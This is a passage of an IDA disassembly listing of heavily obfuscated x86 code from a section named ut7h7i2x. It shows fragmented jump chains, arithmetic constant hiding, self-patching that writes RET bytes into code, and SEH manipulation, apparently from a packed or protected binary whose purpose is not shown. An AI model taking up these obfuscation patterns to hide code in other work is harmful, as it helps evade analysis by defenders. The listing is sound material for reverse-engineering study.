; ---------------------------------------------------------------------------
loc_450BBE: ; CODE XREF: ut7h7i2x:00459C40j
add esi, 74A5533Ah
and esi, 0B1BCCEB9h
add esi, 8036F8EDh
call sub_447939
; START OF FUNCTION CHUNK FOR sub_449FF0
loc_450BD5: ; CODE XREF: sub_449FF0+101F4j
jmp sub_43CEF8
; END OF FUNCTION CHUNK FOR sub_449FF0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_450BDA: ; CODE XREF: sub_44C8F3-85CEj
jmp loc_44B6A0
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_450BDF: ; CODE XREF: sub_44E688-13BD4j
jmp loc_4468CF
; END OF FUNCTION CHUNK FOR sub_44E688
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_450BE4: ; CODE XREF: sub_44C273-E906j
sub esi, 1117034Fh
test edi, 0DA3F8625h
jmp loc_43CBA8
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
sbb esi, eax
jmp loc_44F067
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_458. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_450BFD: ; CODE XREF: sub_442B3B+5Aj
jmp loc_43CBEE
; END OF FUNCTION CHUNK FOR sub_442B3B
; =============== S U B R O U T I N E =======================================
sub_450C02 proc near ; DATA XREF: sub_44865D:loc_44D63Co
push 0FB751057h
pop eax
rol eax, 17h
add eax, 0B17C134Dh
add eax, ebp
push offset loc_44742F
jmp nullsub_127
sub_450C02 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_450C1D: ; CODE XREF: sub_43AE1A+17F00j
xor edx, 9F98307Ah
add eax, edx
pop edx
mov edx, [esp+0]
push eax
mov eax, edx
push esi
push 1028E934h
jmp loc_4423A9
; END OF FUNCTION CHUNK FOR sub_43AE1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_450C37: ; CODE XREF: sub_439B67+15j
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_4484C7
jmp loc_449924
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_450C49: ; CODE XREF: sub_4565B2:loc_449633j
jz loc_451120
loc_450C4F: ; CODE XREF: ut7h7i2x:0044CC9Cj
jmp loc_458982
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
loc_450C54: ; CODE XREF: ut7h7i2x:loc_448989j
jnz loc_45AABD
jmp loc_439211
; ---------------------------------------------------------------------------
mov eax, [esp]
call sub_454196
locret_450C67: ; CODE XREF: ut7h7i2x:0043E42Dj
retn
; ---------------------------------------------------------------------------
loc_450C68: ; CODE XREF: ut7h7i2x:00440400j
jmp locret_4547D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_450C6D: ; CODE XREF: sub_450FDE-15F09j
ror eax, 9
push offset sub_450058
jmp nullsub_441
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
loc_450C7A: ; CODE XREF: ut7h7i2x:loc_44A38Fj
; DATA XREF: sub_4583E7:loc_44A385o
xchg esi, [esp]
mov ebp, esi
pop esi
jmp loc_44E6F1
; ---------------------------------------------------------------------------
push offset sub_454043
jmp locret_451232
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_504. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
or eax, edx
shr edi, 14h
jmp sub_44917B
; ---------------------------------------------------------------------------
push 61ED52Ah
jmp sub_446073
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_450CA5: ; CODE XREF: sub_444A08+F65Dj
jmp loc_445EA8
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_450CAA: ; CODE XREF: sub_453E14-C59Cj
jmp loc_44DF43
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_450CAF: ; CODE XREF: sub_449E96:loc_44D1BFj
xchg esi, [esp+0]
mov [ebp-4], eax
call sub_459FE9
loc_450CBA: ; CODE XREF: ut7h7i2x:0044A960j
jmp loc_454B3E
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
loc_450CBF: ; DATA XREF: sub_440944+66C2o
sub eax, 0FFEC24D5h
push offset sub_458B53
jmp locret_45A6CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_450CCF: ; CODE XREF: sub_442B3B+3Aj
mov ds:off_41D0D4, eax
lea eax, sub_457EF4
mov byte ptr [eax], 0C3h
jmp loc_4582E5
; ---------------------------------------------------------------------------
loc_450CE3: ; CODE XREF: sub_442B3B:loc_442B57j
mov eax, [esp+0]
push ebx
mov ebx, edx
jmp loc_453572
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B27
loc_450CEE: ; CODE XREF: sub_439B27+Cj
jnz loc_449F01
jmp loc_45A6CB
; END OF FUNCTION CHUNK FOR sub_439B27
; ---------------------------------------------------------------------------
loc_450CF9: ; CODE XREF: ut7h7i2x:loc_4526F9j
jl loc_44E1EE
sbb edi, 746D77B3h
rol ebp, 18h
jmp loc_43F9E8
; ---------------------------------------------------------------------------
loc_450D0D: ; CODE XREF: ut7h7i2x:0044F4D9j
and edi, 9BCBE501h
; =============== S U B R O U T I N E =======================================
sub_450D13 proc near ; CODE XREF: ut7h7i2x:0044DDD4p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00443FFB SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
popf
xchg esi, [esp-8+arg_4]
jmp loc_443FFB
sub_450D13 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_450D20: ; DATA XREF: sub_43A556+98ABo
cmp dword ptr [ebp-0Ch], 0
jz loc_4403D1
jmp loc_4568E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_450D2F: ; CODE XREF: sub_4529E0:loc_43C9B7j
jl loc_458B26
test edx, ecx
jmp loc_44EB15
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
loc_450D3C: ; CODE XREF: ut7h7i2x:004482F4j
xor esi, eax
and ecx, 241F7F69h
jz loc_442A8E
loc_450D4A: ; CODE XREF: ut7h7i2x:loc_44E102j
push 0
jmp loc_4480F2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_450D51: ; CODE XREF: sub_452CBB-8DC2j
; sub_452CBB:loc_44BC32j
call sub_4587DD
push 0C8026CD4h
add edx, ebx
jmp loc_458F5A
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_450D62: ; CODE XREF: sub_44F43B-6EF9j
push edx
cmp esi, 3BBD4427h
loc_450D69: ; CODE XREF: ut7h7i2x:00456212j
jmp loc_43DE82
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_450D6E: ; CODE XREF: sub_457A66-4A86j
jge loc_4581D3
and ecx, eax
ja loc_45179E
jmp loc_43EEEE
; END OF FUNCTION CHUNK FOR sub_457A66
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_443. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456944
loc_450D82: ; CODE XREF: sub_456944+Fj
xchg edx, [esp+0]
mov eax, edx
pop edx
rol eax, 1Dh
jmp loc_451775
; END OF FUNCTION CHUNK FOR sub_456944
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_450D90: ; CODE XREF: sub_43DBEC+56C8j
ja sub_440FC3
test ebp, ecx
jmp loc_4406B8
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
locret_450D9D: ; CODE XREF: ut7h7i2x:004577B3j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457541
loc_450D9E: ; CODE XREF: sub_457541-2244j
jmp loc_44424C
; END OF FUNCTION CHUNK FOR sub_457541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_450DA3: ; CODE XREF: sub_43F7A5+145D6j
jmp loc_43A630
; END OF FUNCTION CHUNK FOR sub_43F7A5
; =============== S U B R O U T I N E =======================================
sub_450DA8 proc near ; DATA XREF: sub_44937E+AEB3o
mov ds:dword_4487FC, eax
jmp locret_43AF64
sub_450DA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_450DB3 proc near ; CODE XREF: sub_44937Ej
; FUNCTION CHUNK AT 0043E43A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444FAC SIZE 00000013 BYTES
push ebp
mov ebp, esp
push ecx
jmp loc_444FAC
sub_450DB3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_450DBC: ; CODE XREF: sub_439D5C+12j
jz loc_44F33C
jmp loc_4436EB
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
loc_450DC7: ; CODE XREF: ut7h7i2x:loc_4541B2j
or eax, 4A51C9DAh
and eax, 785DA9D6h
add eax, 87F2DB5Fh
xchg eax, [esp]
jmp sub_43BA59
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_450DE1: ; CODE XREF: sub_45633E-122E6j
jno loc_448D78
adc ebp, edx
or eax, 43FD93B4h
jmp loc_450210
; END OF FUNCTION CHUNK FOR sub_45633E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_296. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4580B3
loc_450DF5: ; CODE XREF: sub_4580B3+2j
rol eax, 8
loc_450DF8: ; CODE XREF: ut7h7i2x:loc_4430A6j
push edi
mov edi, eax
xchg edi, [esp+4+var_4]
retn
; END OF FUNCTION CHUNK FOR sub_4580B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_450DFF: ; CODE XREF: sub_449FD5-5DF4j
jmp nullsub_198
; END OF FUNCTION CHUNK FOR sub_449FD5
; ---------------------------------------------------------------------------
loc_450E04: ; CODE XREF: ut7h7i2x:00445341j
push edx
call sub_441EC6
push 0ABBCC9F5h
pop eax
and eax, 0F2D13D45h
add eax, 3699E917h
xor eax, 44FE5918h
jmp loc_442DB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_450E27: ; CODE XREF: sub_444A08:loc_45196Cj
jz loc_4567F3
jnz loc_44C0A3
add ecx, edx
jmp loc_4567F2
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
test edi, ecx
jmp loc_44581C
; =============== S U B R O U T I N E =======================================
sub_450E41 proc near ; CODE XREF: sub_455F37j
; DATA XREF: sub_4576C6-1799o
; FUNCTION CHUNK AT 0043ECEC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00440FB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443483 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EB63 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00452E1A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004534A9 SIZE 00000009 BYTES
push 83AE45F3h
pop edx
and edx, 4095BE74h
test edx, 2000h
jmp loc_443483
sub_450E41 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C852
loc_450E58: ; CODE XREF: sub_44C852+DB8Cj
jz loc_43960A
shl edx, 6
jmp loc_439608
; END OF FUNCTION CHUNK FOR sub_44C852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_450E66: ; CODE XREF: sub_43A513+19D04j
add edi, edx
jp loc_444998
push eax
loc_450E6F: ; CODE XREF: sub_43A513:loc_4588E6j
mov eax, [esp+0]
call sub_4594B7
loc_450E77: ; CODE XREF: sub_43A513+D45j
; sub_43A513:loc_442DDCj
push offset sub_4512E6
jmp nullsub_141
; END OF FUNCTION CHUNK FOR sub_43A513
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_450E81 proc near ; CODE XREF: sub_44022F+8868j
retn
sub_450E81 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445DB4
loc_450E82: ; CODE XREF: sub_445DB4+12j
jmp loc_45981F
; END OF FUNCTION CHUNK FOR sub_445DB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_450E87: ; CODE XREF: sub_43DBEC+E140j
jz loc_446C23
jmp loc_44E0D0
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
mov eax, 462C961Fh
call sub_43AA94
push edx
push 87291794h
jmp loc_457D27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_450EA7: ; CODE XREF: sub_439B67+1C7B0j
mov edi, esi
pushf
loc_450EAA: ; CODE XREF: sub_439B67:loc_444369j
push 0
push ecx
mov ecx, eax
loc_450EAF: ; CODE XREF: ut7h7i2x:0043AFDDj
xchg ecx, [esp+0Ch+var_C]
push 0E7F0999Ch
pop eax
jmp loc_43FBE9
; END OF FUNCTION CHUNK FOR sub_439B67
; =============== S U B R O U T I N E =======================================
sub_450EBD proc near ; CODE XREF: sub_44FC60-F1BCj
push ebp
mov eax, [ebp-20h]
call sub_44EEB2
pop ecx
mov [ebp-20h], eax
sub_450EBD endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_450ECA: ; CODE XREF: sub_440A88+Dj
; sub_44FC60-F1C2j ...
mov eax, [ebp-20h]
sub eax, [ebp-28h]
jmp loc_4581B8
; END OF FUNCTION CHUNK FOR sub_44FC60
; ---------------------------------------------------------------------------
or ebp, 466AABA6h
jmp sub_442A4D
; ---------------------------------------------------------------------------
mov eax, 8CA83E2Ch
call sub_43AED9
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_450EEA: ; CODE XREF: sub_4524FE:loc_44ACE1j
push edx
push 1FE3752Ch
pop edx
jmp loc_43A85A
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_450EF6: ; CODE XREF: sub_443BC5+11F5Dj
mov ebp, ebx
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_443BC5
; =============== S U B R O U T I N E =======================================
sub_450EFA proc near ; CODE XREF: sub_43B234+4p
; sub_44A7D2-8229p ...
; FUNCTION CHUNK AT 0043D776 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004423E4 SIZE 0000001C BYTES
push esi
jmp loc_43D776
sub_450EFA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_450F00: ; CODE XREF: sub_439BF8:loc_44A576j
; sub_440CEC:loc_45AB25j
jnz loc_43D29E
jmp loc_444F79
; END OF FUNCTION CHUNK FOR sub_440CEC
; =============== S U B R O U T I N E =======================================
sub_450F0B proc near ; DATA XREF: ut7h7i2x:00439DBBo
; FUNCTION CHUNK AT 0043CCD6 SIZE 00000005 BYTES
mov ds:off_41D1F8, eax
lea eax, loc_43F000
mov byte ptr [eax], 0C3h
jmp loc_43CCD6
sub_450F0B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419319
loc_450F1F: ; CODE XREF: sub_419319+Dj
; sub_419319+37C0Bj
; DATA XREF: ...
call sub_450F2A
jmp ds:off_41D1FC
; END OF FUNCTION CHUNK FOR sub_419319
; =============== S U B R O U T I N E =======================================
sub_450F2A proc near ; CODE XREF: ut7h7i2x:0044D19Dj
; sub_419319:loc_450F1Fp ...
; FUNCTION CHUNK AT 0043F0C0 SIZE 0000000B BYTES
xchg ebx, [esp+0]
mov edx, ebx
jmp loc_43F0C0
sub_450F2A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_450F34: ; CODE XREF: sub_445AD1:loc_4493D0j
sub ebx, 85B1A4CAh
loc_450F3A: ; CODE XREF: ut7h7i2x:loc_44F230j
and ebx, 2367CE9Bh
add ebx, 0FF43149Bh
mov [ebx], eax
loc_450F48: ; CODE XREF: sub_439FD5:loc_44CEB6j
pop ebx
loc_450F49: ; CODE XREF: sub_43E6CC+Ej
; sub_45742F+6j
push ecx
jmp loc_454BD1
; END OF FUNCTION CHUNK FOR sub_445AD1
; =============== S U B R O U T I N E =======================================
sub_450F4F proc near ; DATA XREF: sub_43FA50+145D8o
; FUNCTION CHUNK AT 004418D1 SIZE 00000011 BYTES
push 0E1325885h
pop eax
rol eax, 17h
xor eax, 96D89805h
call sub_43AED9
push edi
push 99341B39h
jmp loc_4418D1
sub_450F4F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A0CE
loc_450F6E: ; CODE XREF: sub_44A0CE-7DBAj
xchg edx, [esp-4+arg_0]
mov eax, edx
call sub_456520
call sub_45A20D
loc_450F7D: ; CODE XREF: sub_4482D0+10F25j
jmp loc_459AF4
; END OF FUNCTION CHUNK FOR sub_44A0CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_450F82: ; CODE XREF: sub_449FD5+AAA9j
jmp loc_44E9D0
; END OF FUNCTION CHUNK FOR sub_449FD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_450F87: ; CODE XREF: sub_44081E+13885j
jmp loc_43B4BB
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_450F8C: ; CODE XREF: sub_4433C5-247Dj
jmp loc_44D0DA
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_450F91: ; CODE XREF: sub_452B14-130A1j
jmp loc_456F12
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_450F96: ; CODE XREF: sub_44B789:loc_454BD6j
add edx, 0D7EDAFF3h
xor eax, edx
pop edx
rol eax, 1Fh
xor eax, 0E38A8A42h
mov ds:dword_45A8E8, eax
; END OF FUNCTION CHUNK FOR sub_44B789
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_450FAE: ; CODE XREF: sub_4549F0-1B2D2j
; sub_4529E0+2j
call sub_457AEF
loc_450FB3: ; CODE XREF: sub_4545FB-16989j
jmp loc_43C9B2
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_450FB8: ; CODE XREF: sub_43FCEE+13661j
jz loc_43D9D2
jmp loc_44E51A
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
loc_450FC3: ; CODE XREF: ut7h7i2x:0043DCFAj
adc edx, esi
xor edi, 261A8D33h
jmp loc_447C81
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_450FD0: ; CODE XREF: sub_44B5CF:loc_454FC3j
push edi
mov edi, ecx
xchg edi, [esp+8+var_8]
mov esp, ebp
pop ebp
jmp loc_445A79
; END OF FUNCTION CHUNK FOR sub_44B5CF
; =============== S U B R O U T I N E =======================================
sub_450FDE proc near ; CODE XREF: ut7h7i2x:0043DEDAj
; sub_455CF9-15F0Ap
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043A6CA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043AAC9 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0043B0CE SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043B9F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C062 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043CE1D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E585 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E5EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F688 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440405 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004408AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004418C1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441D12 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441FF3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00442294 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442711 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044401E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044479F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00445841 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004475CC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447FB7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004485A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448F7A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044BF64 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044CF9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450C6D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045328E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045380F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045455C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454D8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454DFA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004554AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C1A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00455D1A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004580E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458F32 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00459B4D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A60F SIZE 0000001E BYTES
xchg esi, [esp+0]
pop esi
add edx, esi
pop esi
mov edx, [edx]
push edi
pushf
push 5CD5B398h
loc_450FEE: ; CODE XREF: sub_447EB5:loc_451E1Dj
jmp loc_442711
sub_450FDE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call nullsub_62
jmp ds:dword_41D130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_450FFE: ; CODE XREF: sub_449D3B-6A2j
jmp nullsub_432
; END OF FUNCTION CHUNK FOR sub_449D3B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sub al, 24h
mov edx, ebp
pop ebp
jz loc_44AEF4
call sub_455597
; START OF FUNCTION CHUNK FOR sub_44697F
loc_451014: ; CODE XREF: sub_44697F:loc_43A061j
push 5D08F3D5h
xchg ebx, [esp+8+var_8]
mov edx, ebx
pop ebx
sub edx, 6B0D0BADh
and edx, 23804FA7h
add edx, 0DEC3F6D4h
xchg edx, [esp+4+var_4]
jmp loc_443EFA
; END OF FUNCTION CHUNK FOR sub_44697F
; =============== S U B R O U T I N E =======================================
sub_451039 proc near ; CODE XREF: sub_444717+36BAp
; ut7h7i2x:0044CE50j
; FUNCTION CHUNK AT 0043F04E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443FEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449A6E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00453047 SIZE 00000020 BYTES
xchg ebx, [esp+0]
pop ebx
jnz loc_45305D
lea edx, [ebp-14h]
jmp loc_449A6E
sub_451039 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_45104B: ; CODE XREF: sub_44C273:loc_45A7C3j
push esi
push 7EE7389Fh
pop esi
and esi, 0DB978D0h
xor esi, 0CA13880h
; END OF FUNCTION CHUNK FOR sub_44C273
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_45105E: ; CODE XREF: sub_449D3B:loc_4447FDj
xchg esi, [esp+8+var_8]
mov eax, [ebp-8]
push eax
jmp loc_450963
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456C9
loc_45106A: ; CODE XREF: sub_4456C9:loc_4456DCj
mov ds:off_41D03C, eax
lea eax, sub_4497C1
mov byte ptr [eax], 0C3h
jmp loc_456A33
; END OF FUNCTION CHUNK FOR sub_4456C9
; =============== S U B R O U T I N E =======================================
sub_45107E proc near ; CODE XREF: sub_41A456+41p
; sub_41A456+44p ...
call sub_45108E
jmp ds:off_41D040
sub_45107E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4399B5
loc_451089: ; CODE XREF: sub_4399B5+11754j
jmp nullsub_421
; END OF FUNCTION CHUNK FOR sub_4399B5
; =============== S U B R O U T I N E =======================================
sub_45108E proc near ; CODE XREF: sub_453EBA:loc_43F360j
; sub_43F7F8+Cj ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043ACDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F809 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004567A5 SIZE 0000000E BYTES
jb loc_43F809
pop edx
jmp loc_43ACDE
sub_45108E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45109A: ; CODE XREF: ut7h7i2x:loc_441F29j
jnz loc_44347D
jmp loc_452778
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_4510A5: ; CODE XREF: ut7h7i2x:0044579Bj
; sub_4406F1+1659Bj
cmp ebx, 0A4F9C161h
jmp loc_442014
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_4510B0: ; CODE XREF: sub_439BD1+19E8Fj
and ebp, 0F7D0A45Fh
adc edi, ebx
loc_4510B8: ; CODE XREF: sub_439BD1:loc_441347j
lea eax, [ebp-24h]
push edi
mov edi, eax
xchg edi, [esp+4+var_4]
jmp loc_44FFB4
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_4510C6: ; CODE XREF: sub_44E688:loc_4468CFj
; ut7h7i2x:0044DBBCj
xor edx, 518D84DEh
xchg edx, [esp+4+var_4]
push ecx
pushf
push 0B6F38550h
or ecx, ebp
jmp loc_44AE81
; END OF FUNCTION CHUNK FOR sub_44E688
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_303. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44941C
loc_4510DE: ; CODE XREF: sub_44941C-E2A0j
and eax, 0EF864D8h
cmp eax, 39201200h
jmp loc_43CC66
; END OF FUNCTION CHUNK FOR sub_44941C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_332. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ds:off_41D0F8, eax
push offset loc_43F465
jmp loc_452F53
; ---------------------------------------------------------------------------
loc_451100: ; CODE XREF: ut7h7i2x:004422BAj
jb loc_44C36F
pop ebx
jmp sub_452D1F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F300
loc_45110C: ; CODE XREF: sub_44F300-6CD5j
call sub_44947D
loc_451111: ; CODE XREF: sub_450651+60C8j
jmp loc_459C07
; END OF FUNCTION CHUNK FOR sub_44F300
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_451116: ; CODE XREF: sub_4462B0:loc_456FC8j
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_451120: ; CODE XREF: sub_4565B2-7EC7j
; sub_4565B2:loc_450C49j
; DATA XREF: ...
pop large dword ptr fs:0
add esp, 4
jmp loc_44363A
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
push eax
ror eax, 1Bh
push esi
push 0A837B2Ah
pop esi
or esi, 28F3F82Dh
add esi, 0D5503C0Dh
mov [esi], eax
jmp loc_44F8B8
; =============== S U B R O U T I N E =======================================
sub_45114D proc near ; CODE XREF: ut7h7i2x:0043CE50j
; sub_44E2C4+Cp
; FUNCTION CHUNK AT 0043BAE7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446012 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C54 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00449841 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451FB0 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
or eax, eax
jnz loc_445734
